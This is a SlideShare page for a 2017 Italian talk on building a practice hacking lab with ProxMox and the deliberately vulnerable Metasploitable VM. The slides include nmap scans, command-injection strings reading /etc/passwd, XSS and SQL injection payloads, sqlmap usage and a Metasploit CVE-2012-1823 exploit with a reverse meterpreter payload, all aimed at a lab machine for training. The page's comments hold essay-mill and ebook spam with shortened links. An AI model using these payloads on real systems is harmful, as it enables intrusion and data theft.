Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Hacking Lab con ProxMox e Metasploitable

1,079 views

Published on

FabLab Bassa Romagna e ImoLUG nell'ambito del gruppo di lavoro su Linux, organizzano una serata dedicata alla Sicurezza Informatica; è un tema attuale, importante, ma molto sottovalutato.

Nella serata illustreremo come è possibile costruire un proprio Hacking Lab per imparare e testare localmente i principali software di IT Security. Sfrutteremo pertanto l'ambiente di virtualizzazione ProxMox per virtualizzare il sistema operativo vulnerabile Metaspoitable, sistema sviluppato dalla nota Radid7. Grazie a BackBox Linux analizzeremo la distribuzione vulnerabile alla ricerca di dettagli e di exploit da sfruttare.

Published in: Technology
  • Did you try ⇒ www.HelpWriting.net ⇐?. They know how to do an amazing essay, research papers or dissertations.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • I’ve personally never heard of companies who can produce a paper for you until word got around among my college groupmates. My professor asked me to write a research paper based on a field I have no idea about. My research skills are also very poor. So, I thought I’d give it a try. I chose a writer who matched my writing style and fulfilled every requirement I proposed. I turned my paper in and I actually got a good grade. I highly recommend ⇒ www.HelpWriting.net ⇐
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Hi there! I just wanted to share a list of sites that helped me a lot during my studies: .................................................................................................................................... www.EssayWrite.best - Write an essay .................................................................................................................................... www.LitReview.xyz - Summary of books .................................................................................................................................... www.Coursework.best - Online coursework .................................................................................................................................... www.Dissertations.me - proquest dissertations .................................................................................................................................... www.ReMovie.club - Movies reviews .................................................................................................................................... www.WebSlides.vip - Best powerpoint presentations .................................................................................................................................... www.WritePaper.info - Write a research paper .................................................................................................................................... www.EddyHelp.com - Homework help online .................................................................................................................................... www.MyResumeHelp.net - Professional resume writing service .................................................................................................................................. www.HelpWriting.net - Help with writing any papers ......................................................................................................................................... Save so as not to lose
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download Full doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download PDF EBOOK here { https://urlzs.com/UABbn } ......................................................................................................................... Download EPUB Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... Download doc Ebook here { https://urlzs.com/UABbn } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THE BOOK INTO AVAILABLE FORMAT (New Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download Full EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download Full doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download PDF EBOOK here { https://soo.gd/irt2 } ......................................................................................................................... Download EPUB Ebook here { https://soo.gd/irt2 } ......................................................................................................................... Download doc Ebook here { https://soo.gd/irt2 } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book THE can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer THE is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBOOK .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, CookBOOK, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, EBOOK, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story THE Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money THE the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths THE Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Hacking Lab con ProxMox e Metasploitable

  1. 1. Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna HACKING LAB con ProxMox e Metasploitable
  2. 2. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux
  3. 3. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta legalità sulle tecniche sfruttate nel Hacking.
  4. 4. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna ProxMox Proxmox VE is a complete open source server virtualization management software. It is based on KVM virtualization and container-based virtualization and manages KVM virtual machines, Linux containers (LXC), storage, virtualized networks, and HA clusters www.proxmox.com
  5. 5. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Metasploitable Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. https://sourceforge.net/projects/metasploitable/
  6. 6. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. BackBox desktop environment includes a complete set of tools required for ethical hacking and security testing. BackBox Linux backbox.org
  7. 7. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Creiamo una nuova Macchina Virtuale dal Pannello Web Ricordatevelo
  8. 8. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  9. 9. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  10. 10. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  11. 11. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  12. 12. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  13. 13. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable
  14. 14. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable $ ssh root@IP_PROXMOX # cd /var/lib/vz/images
 # mkdir 102 (ID del VM che abbiamo prima creato) # cd 102
 # wget http://bit.ly/metasploitable -O metasploitable.zip
 # unzip metasploitable.zip # cd Metasploitable2-Linux/ # mv Metasploitable.vmdk ../ # rm metasploitable.zip ./Metasploitable2-Linux/ -rf
  15. 15. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable # qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2 …Metasploitable.qcow2 # nano /etc/pve/qemu-server/102.conf
  16. 16. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable bootdisk: ide0 ide0: file=local:102/Metasploitable.qcow2,size=8G
  17. 17. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable Avviamo la VM
  18. 18. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Virtualizziamo Metasploitable https://youtu.be/WBsCOjRQKnI
  19. 19. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ nmap 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  20. 20. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: nmap $ sudo nmap -o 192.168.x.x Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.2.128 Host is up (0.0071s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec … … … Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.24 - 2.6.25 Network Distance: 2 hops Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
  21. 21. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Zenmap $ sudo zenmap
  22. 22. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Dirsearch $ dirsearch -e php -u http://192.168.x.x [22:30:01] 200 - 112KB - /doc/ [22:30:01] 302 - 0B - /dvwa/ -> login.php [22:30:03] 200 - 891B - /index.php [22:30:05] 200 - 24KB - /mutillidae/ [22:30:05] 200 - 4KB - /phpMyAdmin/ [22:30:06] 200 - 48KB - /phpinfo.php [22:30:07] 403 - 300B - /server-status/ [22:30:08] 200 - 884B - /test/
  23. 23. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA http://192.168.x.x/dvwa/ admin:password
  24. 24. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Low 192.168.2.1 ; cat /etc/passwd
  25. 25. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA Command Execution Medium 192.168.2.1 & cat /etc/passwd
  26. 26. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Low <script>alert('Hello World')</script>
  27. 27. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Reflected Medium <ScRiPt>alert('Hello World’)</script> <script language="javascript">alert('Hello World’)</script> <img src=x onerror="alert('Hello World')">
  28. 28. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Low <script>document.write(document.cookie)</script> <iframe src=“http://www.makerstation.it/"></iframe> <meta http-equiv="refresh" content="10; url=http:// www.makerstation.it/">
  29. 29. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA XSS Stored Medium <ScRiPt>alert("Hello World 2")</script>
  30. 30. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low ' or '0'='0 ' or '0'='0' union select null, version() # ' or '0'='0' union select null, database() #
  31. 31. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Low and SQLMap sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" -- forms --cookie="security=low; PHPSESSID=xyz"
  32. 32. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: DVWA SQL Injection Medium 0 or 1=1
  33. 33. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Whatweb $ whatweb 192.168.x.x [200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8 (Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10], Title[Metasploitable2 - Linux], WebDAV[2], X-Powered- By[PHP/5.2.4-2ubuntu5.10] $ nmap -sV --script=http-php-version 192.168.x.x |_Version from header x-powered-by: PHP/5.2.4-2 |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
  34. 34. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Metasploit $ sudo metasploit # search CVE-2012-1823 # use exploit/multi/http/php_cgi_arg_injection # show options # set RHOST 192.168.x.x
 # set PAYLOAD php/meterpreter/reverse_tcp # exploit
  35. 35. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Lab: Armitage
  36. 36. >Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna Q&A @AndreaDraghetti

×